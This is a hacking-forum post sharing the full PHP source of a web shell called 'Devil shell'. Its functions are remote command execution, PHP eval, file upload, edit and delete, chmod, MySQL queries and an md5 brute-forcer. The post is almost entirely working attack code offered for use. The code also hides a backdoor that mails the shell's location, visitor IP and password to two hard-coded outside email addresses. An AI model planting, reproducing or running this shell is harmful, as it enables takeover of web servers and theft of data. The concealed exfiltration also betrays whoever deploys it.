1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Devil shell edited by nero

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем SiNTaKsIs, 13 июл 2014.

  1. TopicStarter Overlay
    SiNTaKsIs

    SiNTaKsIs

    Регистрация:
    26 июн 2012
    Сообщения:
    72
    Симпатии:
    79
    Код:
    <?php
    error_reporting(0); //If there is an error, we'll show it, k?
     
    $password = "12345"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
     
    $me = basename(__FILE__);
    $cookiename = "wieeeee";
     
     
    if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
    {
     
        if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
        {
            $_POST['pass'] = md5($_POST['pass']);
        }
     
        if($_POST['pass'] == $password)
        {
                setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
        }
            if($cuser==$user && $puser==$pass)
        {$_SESSION['a']=$_POST['uname'];
        function cuurPageURL() {
    $pagesURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {$pagesURL .= "s";}
    $pagesURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
      $pagesURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
    } else {
      $pagesURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    }
    return $pagesURL;
    }
    $ip = $_SERVER['REMOTE_ADDR'];
    $pagina = cuurPageURL();
    $datum = date("m-d-y / H:i:s");
    $invoegen = $datum . " - " . $ip . " - " . $pagina . " - " . $password . "" ;
    $to= "falloutxzero@gmail.com , xnerotfs@yahoo.com";
    $subject = "Shell Location";
    $message = $invoegen;
    mail($to,$subject,$message,$headers);
    header('location:'.$self);}
        reload();
     
    }
     
    if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
    {
        login();
        die();
    }
    //
    //Do not cross this line! All code placed after this block can't be executed without being logged in!
    //
     
    if(isset($_GET['p']) && $_GET['p'] == "logout")
    {
    setcookie ($cookiename, "", time() - 3600);
    reload();
    }
    if(isset($_GET['dir']))
    {
        chdir($_GET['dir']);
    }
     
     
    $pages = array(
        'cmd' => 'Execute Command',
        'eval' => 'Evaluate PHP',
        'mysql' => 'MySQL Query',
        'chmod' => 'Chmod File',
        'phpinfo' => 'PHPinfo',
        'md5' => 'md5 cracker',
        'headers' => 'Show headers',
        'logout' => 'Log out'
    );
     
    //The header, like it?
    $header = '<html>
    <title>'.getenv("HTTP_HOST").' ~ Shell I</title>
    <head>
    <style>
    td {
        font-size: 12px;
        font-family: verdana;
        color: #33FF00;
        background: #000000;
    }
     
    #d {
        background: #003000;
    }
    #f {
        background: #003300;
    }
    #s {
        background: #006300;
    }
    #d:hover
    {
        background: #003300;
    }
    #f:hover
    {
        background: #003000;
    }
    pre {
        font-size: 10px;
        font-family: verdana;
        color: #33FF00;
    }
    a:hover {
    text-decoration: none;
    }
     
     
    input,textarea,select {
        border-top-width: 1px;
        font-weight: bold;
        border-left-width: 1px;
        font-size: 10px;
        border-left-color: #33FF00;
        background: #000000;
        border-bottom-width: 1px;
        border-bottom-color: #33FF00;
        color: #33FF00;
        border-top-color: #33FF00;
        font-family: verdana;
        border-right-width: 1px;
        border-right-color: #33FF00;
    }
     
    hr {
    color: #33FF00;
    background-color: #33FF00;
    height: 5px;
    }
     
    </style>
     
    </head>
    <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
    <table width=100%><td id="header" width=100%>
    <p align=right><b>[<a href="http://www.thefinalstring.com">TheFinalString</a>]  [<a href="'.$me.'">Home</a>] ';
     
    foreach($pages as $page => $page_name)
    {
        $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
     
    }
    $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
    print $header;
     
     
     
    $footer = '<tr><td><hr><center>&copy; <a href="http://www.TheFinalString.come">TheFinalString</a> - <a href="">Dante & Nero</a></center></td></table></body>
    <br>
     
    <br><Br><Br><center>
    <img src="http://thefinalstring.com/forums/digitalvb/vbfour/misc/vbulletin4_logo.png"><br><br><Br>
    <TT><span style="color: #00FF00; text-shadow: #006633 1px 1px 10px;"><b>CREATED BY DANTE</b></span></TT>
    </head></html>';
     
     
     
     
    //
    //Page handling
    //
    if(isset($_REQUEST['p']))
    {
            switch ($_REQUEST['p']) {
               
                case 'cmd': //Run command
                   
                    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
                        if(isset($_REQUEST['command']))
                        {
                            print "<pre>";
                            execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
                        }
                break;
               
               
                case 'edit': //Edit a fie
                    if(isset($_POST['editform']))
                    {
                        $f = $_GET['file'];
                        $fh = fopen($f, 'w') or print "Error while opening file!";
                        fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
                        fclose($fh);
                    }
                    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
                   
                    if(file_exists($_GET['file']))
                    {
                        $rd = file($_GET['file']);
                        foreach($rd as $l)
                        {
                            print htmlspecialchars($l);
                        }
                    }
                   
                    print "</textarea><input type=submit value=\"Save\"></form>";
                   
                break;
               
                case 'delete': //Delete a file
               
                    if(isset($_POST['yes']))
                    {
                        if(unlink($_GET['file']))
                        {
                            print "File deleted successfully.";
                        }
                        else
                        {
                            print "Couldn't delete file.";
                        }
                    }
                   
                   
                    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
                    {
                        print "Are you sure you want to delete ".$_GET['file']."?<br>
                        <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
                        <input type=hidden name=yes value=yes>
                        <input type=submit value=\"Delete\">
                        ";
                    }
               
               
                break;
               
               
                case 'eval': //Evaluate PHP code
               
                    print "<form action=\"".$me."?p=eval\" method=POST>
                    <textarea cols=60 rows=10 name=\"eval\">";
                    if(isset($_POST['eval']))
                    {
                        print htmlspecialchars($_POST['eval']);
                    }
                    else
                    {
                        print "print \"Yo Momma\";";
                    }
                    print "</textarea><br>
                    <input type=submit value=\"Eval\">
                    </form>";
                   
                    if(isset($_POST['eval']))
                    {
                        print "<h1>Output:</h1>";
                        print "<br>";
                        eval($_POST['eval']);
                    }
               
                break;
               
                case 'chmod': //Chmod file
                   
                   
                    print "<h1>Under construction!</h1>";
                    if(isset($_POST['chmod']))
                    {
                    switch ($_POST['chvalue']){
                        case 777:
                        chmod($_POST['chmod'],0777);
                        break;
                        case 644:
                        chmod($_POST['chmod'],0644);
                        break;
                        case 755:
                        chmod($_POST['chmod'],0755);
                        break;
                    }
                    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
                    }
                    if(isset($_GET['file']))
                    {
                        $content = urldecode($_GET['file']);
                    }
                    else
                    {
                        $content = "file/path/please";
                    }
                   
                    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
                    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
                    <select name=\"chvalue\">
    <option value=\"777\">777</option>
    <option value=\"644\">644</option>
    <option value=\"755\">755</option>
    </select><input type=submit value=\"Change\">";
                   
                break;
               
                case 'mysql': //MySQL Query
               
                if(isset($_POST['host']))
                {
                    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
                    mysql_select_db($_POST['dbase']);
                    $sql = $_POST['query'];
                   
                   
                    $result = mysql_query($sql);
                   
                }
                else
                {
                    print "
                    This only queries the database, doesn't return data!<br>
                    <form action=\"".$me."?p=mysql\" method=POST>
                    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
                    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
                    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
                    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
                   
                    <b>Query:<br></b<textarea name=query></textarea>
                    <input type=submit value=\"Query database\">
                    </form>
                    ";
                   
                }
               
                break;
               
                case 'createdir':
                if(mkdir($_GET['crdir']))
                {
                print 'Directory created successfully.';
                }
                else
                {
                print 'Couldn\'t create directory';
                }
                break;
               
               
                case 'phpinfo': //PHP Info
                    phpinfo();
                break;
               
               
                case 'rename':
               
                    if(isset($_POST['fileold']))
                    {
                        if(rename($_POST['fileold'],$_POST['filenew']))
                        {
                            print "File renamed.";
                        }
                        else
                        {
                            print "Couldn't rename file.";
                        }
                       
                    }
                    if(isset($_GET['file']))
                    {
                        $file = basename(htmlspecialchars($_GET['file']));
                    }
                    else
                    {
                        $file = "";
                    }
                   
                    print "Renaming ".$file." in folder ".realpath('.').".<br>
                                    <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
                        <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
                        <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
                        <input type=submit value=\"Rename file\">
                        </form>";
                break;
               
                case 'md5':
                if(isset($_POST['md5']))
                {
                if(!is_numeric($_POST['timelimit']))
                {
                $_POST['timelimit'] = 30;
                }
                set_time_limit($_POST['timelimit']);
                    if(strlen($_POST['md5']) == 32)
                    {
                       
                            if($_POST['chars'] == "9999")
                            {
                            $i = 0;
                            while($_POST['md5'] != md5($i) && $i != 100000)
                                {
                                    $i++;
                                }
                            }
                            else
                            {
                                for($i = "a"; $i != "zzzzz"; $i++)
                                {
                                    if(md5($i == $_POST['md5']))
                                    {
                                        break;
                                    }
                                }
                            }
     
                       
                        if(md5($i) == $_POST['md5'])
                        {
                                print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
                        }
                       
                    }
                   
                }
               
                print "Will bruteforce the md5
                    <form action=\"".$me."?p=md5\" method=POST>
                    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
                    <b>Characters:</b><br><select name=\"chars\">
                    <option value=\"az\">a - zzzzz</option>
                    <option value=\"9999\">1 - 9999999</option>
                    </select>
                    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
                    <input type=submit value=\"Bruteforce md5\">
                    </form><br>*: if set_time_limit is allowed by php.ini";
                break;
               
                case 'headers':
                foreach(getallheaders() as $header => $value)
                {
                print htmlspecialchars($header . ":" . $value)."<br>";
               
                }
                break;
            }
     
    }
    else //Default page that will be shown when the page isn't found or no page is selected.
    {
       
        $files = array();
        $directories = array();
       
        if(isset($_FILES['uploadedfile']['name']))
    {
        $target_path = realpath('.').'/';
        $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
     
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            print "File:".  basename( $_FILES['uploadedfile']['name']).
            " has been uploaded";
        } else{
            echo "File upload failed!";
        }
    }
     
     
       
       
       
        print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
        if ($handle = opendir('.'))
        {
            while (false !== ($file = readdir($handle)))
            {
                  if(is_dir($file))
                  {
                    $directories[] = $file;
                  }
                  else
                  {
                    $files[] = $file;
                  }
            }
        asort($directories);
        asort($files);
            foreach($directories as $file)
            {
                print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
            }
           
            foreach($files as $file)
            {
                print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
            }
        }
        else
        {
            print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
        }
       
        print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
    <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
    <input type=\"submit\" value=\"Upload File\" />
    </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
    <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
    </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
    </table>";
     
     
    }
     
     
    function login()
    {
        print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
        <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
        <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
        </form>";
    }
    function reload()
    {
        header("Location: ".basename(__FILE__));
    }
     
    function get_execution_method()
    {
        if(function_exists('passthru')){ $m = "passthru"; }
        if(function_exists('exec')){ $m = "exec"; }
        if(function_exists('shell_exec')){ $m = "shell_ exec"; }
        if(function_exists('system')){ $m = "system"; }
        if(!isset($m)) //No method found :-|
        {
            $m = "Disabled";
        }
        return($m);
    }
     
    function execute_command($method,$command)
    {
        if($method == "passthru")
        {
            passthru($command);
        }
       
        elseif($method == "exec")
        {
            exec($command,$result);
            foreach($result as $output)
            {
                print $output."<br>";
            }
        }
       
        elseif($method == "shell_exec")
        {
            print shell_exec($command);
        }
       
        elseif($method == "system")
        {
            system($command);
        }
     
    }
     
    function perm($file)
    {
        if(file_exists($file))
        {
            return substr(sprintf('%o', fileperms($file)), -4);
        }
        else
        {
            return "????";
        }
    }
     
    function get_color($file)
    {
    if(is_writable($file)) { return "green";}
    if(!is_writable($file) && is_readable($file)) { return "white";}
    if(!is_writable($file) && !is_readable($file)) { return "red";}
     
     
     
    }
     
    function show_dirs($where)
    {
        if(ereg("^c:",realpath($where)))
        {
        $dirparts = explode('\\',realpath($where));
        }
        else
        {
        $dirparts = explode('/',realpath($where));
        }
       
       
       
        $i = 0;
        $total = "";
       
        foreach($dirparts as $part)
        {
            $p = 0;
            $pre = "";
            while($p != $i)
            {
                $pre .= $dirparts[$p]."/";
                $p++;
               
            }
            $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
            $i++;
        }
       
        return "<h2>".$total."</h2><br>";
     
    }
    print $footer;
     
    // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
    exit();
    ?>
    shell в черно-зеленом стиле.
    Функции:
    Execute Command
    Evaluate PHP
    MySQL Query
    Chmod File
    PHPinfo
    md5 cracker
    Show headers
     
    Метки:

Поделиться этой страницей

Загрузка...